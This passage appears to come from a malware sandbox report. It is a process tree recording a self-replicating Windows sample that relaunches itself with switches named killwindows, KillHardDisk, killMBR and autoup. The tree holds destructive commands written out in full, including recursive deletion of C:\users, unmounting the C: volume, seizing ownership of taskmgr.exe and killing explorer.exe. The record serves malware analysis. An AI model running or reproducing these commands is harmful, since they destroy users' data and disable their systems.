        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killwindows 1697996445
        11⤵
        
        PID:5616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        12⤵
        
        PID:3844
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        13⤵
        Modifies file permissions
        
        PID:5436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /KillHardDisk 1697996445
        10⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /KillHardDisk 1697996445
        11⤵
        
        PID:5868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:9704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:9748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:3764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killMBR 1697996445
        10⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /killMBR 1697996445
        11⤵
        
        PID:9140
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /protect 1697996445
        10⤵
        
        PID:7200
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /protect 1697996445
        11⤵
        
        PID:6360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:12204
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe /autoup 1697996445
        10⤵
        
        PID:2376
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+4306.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        8⤵
        
        PID:5588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+729543.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        8⤵
        
        PID:7400
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe 1697996445
        8⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe 1697996445
        9⤵
        
        PID:3440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:9800
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:9092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /autoup 1697996445
        10⤵
        
        PID:5472
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /autoup 1697996445
        11⤵
        
        PID:10680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /killwindows 1697996445
        10⤵
        
        PID:9108
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /KillHardDisk 1697996445
        10⤵
        
        PID:7964
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d017.exe /killMBR 1697996445
        10⤵
        
        PID:6280
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        6⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:2160
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        6⤵
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /save 1697996445
        7⤵
        
        PID:5620
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        8⤵
        Executes dropped EXE
        
        PID:6032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
        9⤵
        
        PID:8236
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d014.exe 1697996445
        10⤵
        Executes dropped EXE
        
        PID:10172
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        11⤵
        
        PID:7648
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        12⤵
        Kills process with taskkill
        
        PID:9120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
        9⤵
        
        PID:10640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe 1697996445
        9⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe 1697996445
        10⤵
        
        PID:10588
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        11⤵
        
        PID:8172
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        12⤵
        Kills process with taskkill
        
        PID:9760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /autoup 1697996445
        11⤵
        
        PID:10816
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /autoup 1697996445
        12⤵
        
        PID:8684
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /killwindows 1697996445
        11⤵
        
        PID:7056
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /killwindows 1697996445
        12⤵
        
        PID:5816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /KillHardDisk 1697996445
        11⤵
        
        PID:12072
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /killMBR 1697996445
        11⤵
        
        PID:6480
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d013.exe /protect 1697996445
        11⤵
        
        PID:11980
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d01.exe /protect 1697996445
        6⤵
        Executes dropped EXE
        
        PID:5620
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:5392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:6604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /save 1697996445
    3⤵
    PID:4424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4084
- - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe /protect 1697996445
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+51351.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
      4⤵
      PID:3972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe 1697996445
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3044
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe 1697996445
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
        6⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:2072
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1932
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
        6⤵
        
        PID:3732
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:2116
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+811577.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        8⤵
        
        PID:976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe 1697996445
        8⤵
        
        PID:5820
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:5388
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /protect 1697996445
        10⤵
        
        PID:6976
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /protect 1697996445
        11⤵
        Executes dropped EXE
        
        PID:9268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe+815529.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0588.exe
        12⤵
        
        PID:10264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0588.exe 1697996445
        12⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0588.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0588.exe 1697996445
        13⤵
        
        PID:8580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        14⤵
        
        PID:4100
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        15⤵
        Kills process with taskkill
        
        PID:3248
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe+514918.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0585.exe
        12⤵
        
        PID:10992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0585.exe 1697996445
        12⤵
        
        PID:11648
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /save 1697996445
        10⤵
        
        PID:9416
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /save 1697996445
        11⤵
        
        PID:4368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:10836
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /autoup 1697996445
        10⤵
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /autoup 1697996445
        11⤵
        
        PID:8168
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /killwindows 1697996445
        10⤵
        
        PID:6456
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /killwindows 1697996445
        11⤵
        
        PID:10736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /KillHardDisk 1697996445
        10⤵
        
        PID:664
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /KillHardDisk 1697996445
        11⤵
        
        PID:10800
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        12⤵
        
        PID:4316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        12⤵
        
        PID:2284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /killMBR 1697996445
        10⤵
        
        PID:11184
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /killMBR 1697996445
        11⤵
        
        PID:8736
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe /autoup 1697996445
        10⤵
        
        PID:1524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d058.exe C:\windows\system32\taskmgr.exe
        10⤵
        
        PID:9304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+621689.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d056.exe
        8⤵
        
        PID:6180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d056.exe 1697996445
        8⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d056.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d056.exe 1697996445
        9⤵
        
        PID:10720
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:9380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:4964
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
        6⤵
        
        PID:4908
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
        6⤵
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /protect 1697996445
        7⤵
        Executes dropped EXE
        
        PID:5500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+432551.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
        8⤵
        
        PID:6436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe 1697996445
        8⤵
        
        PID:5796
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe 1697996445
        9⤵
        Executes dropped EXE
        
        PID:9464
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:11216
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:8692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /autoup 1697996445
        10⤵
        
        PID:6440
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /autoup 1697996445
        11⤵
        
        PID:5840
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /killwindows 1697996445
        10⤵
        
        PID:6072
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /killwindows 1697996445
        11⤵
        
        PID:6176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /KillHardDisk 1697996445
        10⤵
        
        PID:8968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /killMBR 1697996445
        10⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /killMBR 1697996445
        11⤵
        
        PID:512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d054.exe /protect 1697996445
        10⤵
        
        PID:9308
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe+38555.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d053.exe
        8⤵
        
        PID:10200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d053.exe 1697996445
        8⤵
        
        PID:9256
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d053.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d053.exe 1697996445
        9⤵
        
        PID:7884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        10⤵
        
        PID:3788
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        11⤵
        Kills process with taskkill
        
        PID:4916
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d053.exe /autoup 1697996445
        10⤵
        
        PID:3296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d053.exe /killMBR 1697996445
        10⤵
        
        PID:1544
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
        6⤵
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d05.exe /save 1697996445
        7⤵
        Executes dropped EXE
        
        PID:6776
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
        6⤵
        
        PID:7992
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer.exe
        7⤵
        Kills process with taskkill
        
        PID:10148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d0.exe+65982.txt C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
      4⤵
      PID:1168
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe 1697996445
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3760
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.0e3baa4a5958cfc6c75b731f2e8fd1d06.exe
        
